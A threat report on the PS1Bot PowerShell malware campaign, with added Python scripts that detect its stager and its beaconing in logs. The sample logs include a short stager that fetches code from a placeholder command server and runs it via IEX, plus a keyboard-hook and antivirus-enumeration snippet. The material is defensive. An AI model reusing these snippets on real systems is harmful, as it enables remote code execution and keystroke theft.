Regions Targeted: Not specified
Related Families: AHK Bot, Skitnet/Bossnet
Key Takeaways
What is PS1Bot?
The campaign begins with victims receiving compressed archives disguised as legitimate files. These archives, often delivered via malvertising or SEO poisoning, contain a JScript file named “FULL DOCUMENT.js,” which functions as a downloader. This file, typically obfuscated VBScript, retrieves a JScript scriptlet from an attacker-controlled server. The scriptlet sets up the environment by writing a PowerShell script to `C:\ProgramData\`, which then polls a command-and-control (C2) server using the system’s C: drive serial number to construct dynamic URLs. This script executes additional PowerShell content via Invoke-Expression (IEX), enabling continuous C2 communication with periodic Sleep() delays.
PS1Bot’s modular architecture includes several purpose-built components. The antivirus detection module queries Windows Management Instrumentation (WMI) to identify installed security products, transmitting results to the C2 server via HTTP GET requests with URL parameters. The screen capture module dynamically compiles a C# assembly to generate screenshots, saving them as JPEGs in `%APPDATA%` before encoding and exfiltrating them via HTTP POST. The keylogger module, also using C# compilation, employs `SetWindowsHookEx()` to capture keystrokes and clipboard data, relaying them to the C2 server. The information collection module gathers system details like domain membership via WMI queries, aiding attacker reconnaissance.
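The behaviours described in the two paragraphs above (a PowerShell stager that derives its C2 URL from the C: drive serial and feeds downloaded content to IEX inside a sleep-delayed loop, WMI queries against the security center, and a dynamically compiled C# hook) each leave recognisable text in PowerShell script-block logging. The following Python triage script is an added example written for this page, not PolySwarm's or Talos's tooling and not derived from a PS1Bot sample; the rule patterns and the three sample script-block entries are constructed from the report's description, and the C2 hostname is a placeholder.

```python
"""Triage PowerShell script-block log entries (Event ID 4104 ScriptBlockText) for
PS1Bot-style behaviours described in the report. Added example; rules and samples
are constructed from the prose, not extracted from malware."""
import re

# Each rule fires only when every pattern in its list matches somewhere in the script.
# Pairing patterns (e.g. IEX *and* a download primitive) keeps single-keyword noise down.
RULES = {
    "remote_content_to_iex": [
        r"\b(?:iex|invoke-expression)\b",
        r"\b(?:downloadstring|invoke-webrequest|iwr|invoke-restmethod|irm|net\.webclient)\b",
    ],
    "drive_serial_in_c2_url": [r"volumeserialnumber", r"https?://"],
    "av_enumeration_via_wmi": [r"root[\\/]+securitycenter2|antivirusproduct"],
    "dynamic_csharp_keyboard_hook": [r"\badd-type\b", r"setwindowshookex"],
    "polling_loop_with_sleep": [r"\bwhile\s*\(\s*\$true\s*\)", r"\bstart-sleep\b"],
    "staging_in_programdata": [r"(?:c:\\programdata|\$env:programdata)"],
}
COMPILED = {name: [re.compile(p, re.IGNORECASE) for p in pats] for name, pats in RULES.items()}


def analyze_script(text: str) -> list[str]:
    """Return the names of all rules whose patterns all match the script text."""
    return [name for name, pats in COMPILED.items() if all(p.search(text) for p in pats)]


def triage(events, min_rules: int = 2):
    """events: iterable of dicts with 'id' and 'script'. An entry is reported only when
    at least min_rules behaviours co-occur, so a lone ProgramData path is not enough."""
    findings = []
    for ev in events:
        hits = analyze_script(ev["script"])
        if len(hits) >= min_rules:
            findings.append({"id": ev["id"], "rules": hits})
    return findings


# Constructed sample script blocks (not real logs): a polling stager, a benign admin
# script that touches WMI and ProgramData, and a module that compiles a hook and lists AV.
SAMPLE_EVENTS = [
    {"id": "4104-0001", "script": r'''
$serial = (Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'").VolumeSerialNumber
$base = "http://c2-placeholder.example.invalid/" + $serial
while ($true) {
    try { $r = (New-Object Net.WebClient).DownloadString($base + "/task"); IEX $r } catch {}
    Start-Sleep -Seconds 30
}
'''},
    {"id": "4104-0002", "script": r'''
# benign: monthly disk-space report
Get-WmiObject Win32_LogicalDisk | Select-Object DeviceID, FreeSpace, Size |
    Export-Csv "$env:ProgramData\reports\disk.csv" -NoTypeInformation
'''},
    {"id": "4104-0003", "script": r'''
$src = @"
using System; using System.Runtime.InteropServices;
public class H { [DllImport("user32.dll")] public static extern IntPtr SetWindowsHookEx(int id, IntPtr cb, IntPtr h, uint t); }
"@
Add-Type -TypeDefinition $src
$av = Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
'''},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["id"], ", ".join(finding["rules"]))
```

Run as-is it reports the stager (remote download to IEX, drive serial in a URL, sleep-delayed loop) and the hook/AV module, while the disk-space report matches only the ProgramData rule and stays below the threshold. The co-occurrence threshold is the point: any one of these strings is common in legitimate administration, but two or more in a single script block is worth an analyst's attention.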
The “grabber” module is particularly notable for targeting cryptocurrency-related data. It scans for browser credentials, cryptocurrency wallet extensions, and local wallet applications. Using embedded wordlists, including English and Czech variants, it identifies files containing passwords or wallet seed phrases, compressing and exfiltrating them via HTTP POST. The persistence module ensures longevity by creating randomly named PowerShell scripts, shortcuts, and LNK files in `%PROGRAMDATA%` and the Startup directory, re-establishing C2 communication post-reboot.
PS1Bot shares architectural similarities with AHK Bot and overlaps with Skitnet/Bossnet in C2 infrastructure and code design, particularly in URL construction and persistence mechanisms. Its heavy reliance on in-memory execution and dynamic compilation reduces its disk footprint, complicating traditional detection methods. The campaign’s frequent updates and modular flexibility indicate an evolving threat requiring robust endpoint and network monitoring. PolySwarm analysts consider PS1Bot to be an emerging and evolving threat.
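Because the stager polls its C2 server on a Sleep()-paced loop, the network side of the "robust endpoint and network monitoring" the paragraph calls for can look for exactly that regularity. The script below is an added example for this page, not PolySwarm's or Talos's code: it parses constructed web-proxy records of the form `<ISO timestamp> <client> <method> <url>` (a layout assumed for the example) and flags client/host pairs whose request spacing is too regular to be human browsing. The hostnames and client address are placeholders.

```python
"""Flag periodic HTTP polling (beaconing) in web-proxy logs. Added example with
constructed data; the log line layout is an assumption for the example."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed proxy log: one host polled every ~30 s, one browsed irregularly. Not real traffic.
SAMPLE_LOG = """\
2025-08-14T09:00:00Z 10.1.2.30 GET http://updates.example.invalid/5a3f1c9e/task
2025-08-14T09:00:31Z 10.1.2.30 GET http://updates.example.invalid/5a3f1c9e/task
2025-08-14T09:01:01Z 10.1.2.30 GET http://updates.example.invalid/5a3f1c9e/task
2025-08-14T09:01:32Z 10.1.2.30 GET http://updates.example.invalid/5a3f1c9e/task
2025-08-14T09:02:02Z 10.1.2.30 GET http://updates.example.invalid/5a3f1c9e/task
2025-08-14T09:02:33Z 10.1.2.30 GET http://updates.example.invalid/5a3f1c9e/task
2025-08-14T09:00:05Z 10.1.2.30 GET http://intranet.example.invalid/home
2025-08-14T09:00:09Z 10.1.2.30 GET http://intranet.example.invalid/style.css
2025-08-14T09:07:40Z 10.1.2.30 GET http://intranet.example.invalid/news
2025-08-14T09:45:12Z 10.1.2.30 GET http://intranet.example.invalid/home
2025-08-14T10:10:00Z 10.1.2.30 GET http://intranet.example.invalid/logout
2025-08-14T10:30:00Z 10.1.2.30 GET http://intranet.example.invalid/home
"""


def parse_log(text: str):
    """Parse lines into (timestamp, client, method, host) tuples; blank lines are skipped."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url = line.split()
        stamp = datetime.fromisoformat(ts.replace("Z", "+00:00"))
        records.append((stamp, client, method, urlsplit(url).netloc))
    return records


def find_beacons(records, min_requests: int = 5, max_cv: float = 0.2):
    """Return (client, host, mean_gap_seconds, cv) for pairs with at least min_requests
    requests whose inter-request gaps have a coefficient of variation <= max_cv.
    A cv near 0 means near-constant spacing, the signature of a fixed sleep delay."""
    by_pair = defaultdict(list)
    for stamp, client, _method, host in records:
        by_pair[(client, host)].append(stamp)
    hits = []
    for (client, host), stamps in by_pair.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # duplicate timestamps only; nothing periodic to measure
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            hits.append((client, host, round(avg, 1), round(cv, 3)))
    return hits


if __name__ == "__main__":
    for client, host, avg, cv in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{client} -> {host}: every {avg}s (cv={cv})")
```

On the sample the polling host is reported with a mean gap of 30.6 s and a cv of about 0.016, while the intranet browsing, despite also exceeding the request threshold, has gaps ranging from seconds to tens of minutes and is left alone. In production, raise `min_requests` and lower `max_cv` for noisy environments, and remember that many legitimate agents (update checkers, telemetry) beacon too, so the output is a hunting lead to be joined with the endpoint evidence, not a verdict on its own.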
IOCs
PolySwarm has multiple samples associated with this activity. You can use the following CLI command to search for all PS1Bot samples in our portal:
$ polyswarm link list -f PS1Bot
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.